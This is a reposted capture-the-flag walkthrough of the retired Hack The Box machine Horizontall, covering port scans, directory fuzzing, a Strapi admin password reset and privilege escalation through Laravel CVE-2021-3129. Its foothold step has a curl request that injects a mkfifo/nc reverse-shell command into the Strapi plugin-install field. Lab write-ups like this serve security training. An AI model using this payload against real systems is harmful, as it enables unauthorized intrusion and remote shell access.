10

Horizontall: Hack The Box Walkthrough

 2 years ago
source link: https://hackso.me/horizontall-htb-walkthrough/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

This post documents the complete walkthrough of Horizontall, a retired vulnerable VM created by wail99, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Horizontall is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.11.105 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-30 04:26:35 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.11.105
Discovered open port 22/tcp on 10.10.11.105

Nothing unusual. Let’s do one better with nmap scanning the discovered ports to establish their services.

nmap -n -v -Pn -p22,80 -A --reason 10.10.11.105 -oN nmap.txt
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb

I’d better map horizontall.htb to 10.10.11.105 in /etc/hosts. This is what the site looks like.

I’m guessing HT refers to Horizontall.

Directory/File Enumeration

Let’s see what we can glean from gobuster and SecLists for a start.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -e -t 20 -x php,htm,html,txt -u http://horizontall.htb/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://horizontall.htb/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,php,htm
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/08/30 06:24:57 Starting gobuster in directory enumeration mode
===============================================================
http://horizontall.htb/js                   (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]
http://horizontall.htb/css                  (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
http://horizontall.htb/img                  (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
http://horizontall.htb/index.html           (Status: 200) [Size: 901]

===============================================================
2021/08/30 06:26:09 Finished
===============================================================

This is a shit-show. We need more information.

Burp Suite - Site Map

Suppose we reload the site through Burp Suite.

What do we have here? I’d better include api-prod.horizontall.htb into the mix as well. A simple curl reveals more.

I wonder what’s Strapi…

Strapi Framework Vulnerable to Remote Code Execution

In any case, let’s run ffuf on api-prod.horizontall.htb and see what we get.

ffuf -u http://api-prod.horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://api-prod.horizontall.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

Admin                   [Status: 200, Size: 854, Words: 98, Lines: 17]
ADMIN                   [Status: 200, Size: 854, Words: 98, Lines: 17]
admin                   [Status: 200, Size: 854, Words: 98, Lines: 17]
favicon.ico             [Status: 200, Size: 1150, Words: 4, Lines: 1]
index.html              [Status: 200, Size: 413, Words: 76, Lines: 20]
robots.txt              [Status: 200, Size: 121, Words: 19, Lines: 4]
reviews                 [Status: 200, Size: 507, Words: 21, Lines: 1]
users                   [Status: 403, Size: 60, Words: 1, Lines: 1]

I had Burp Suite on the entire time and when I saw the following response when I browsed to http://api-prod.horizontall.htb/admin, I knew I struck gold.

A quick Google search on “strapi rce” led me to this article. In short, Strapi 3.0.0-beta.17.7 or earlier is vulnerable to authenticated RCE and we have a 3.0.0-beta.17.4 on our hands.

Strapi Password Reset

Now, how can we get our hands on a password for remote code execution? Well, we don’t. There’s another vulnerability that allows us to reset a Strapi Administrator password without reset tokens. Armed with this insight all we need to reset the password is a POST request like so.

What’s really important is the JWT.

Foothold

Now that we have a valid JWT, getting foothold is easy.

curl -i \
     -s \
     -k \
     -X $'POST' \
     -H $'Authorization: Bearer [jwt]' \
     -H $'Content-Type: application/json' \
     -H $'Connection: close' \
     --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.17.134 1234 >/tmp/f)\",\"port\":\"1337\"}' \
     $'http://api-prod.horizontall.htb/admin/plugins/install'

The file user.txt is in developer’s home directory.

Privilege Escalation

During enumeration of strapi’s account, I notice port (8000/tcp) listening on localhost.

I can easily inject a SSH key I control into /opt/strapi/.ssh/authorized_keys to 1) get a more stable shell, and 2) perform local port forwarding like so.

ssh -L 8000:127.0.0.1:8000 -i strapi [email protected]

Laravel

So, Lavarel is runnning at 8000/tcp.

CVE-2021-3129 - Unauthenticated RCE in Ignition before 2.5.2 used in Laravel

We are looking at CVE-2021-3129. There are plenty of exploits for CVE-2021-3129 in GitHub and I’ve chosen the one that appears to be the most straightforward.

I have shell over at my attacking terminal, a root shell no less.

Armed with a root shell, it’s trivial to retrieve root.txt.

:dancer:


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK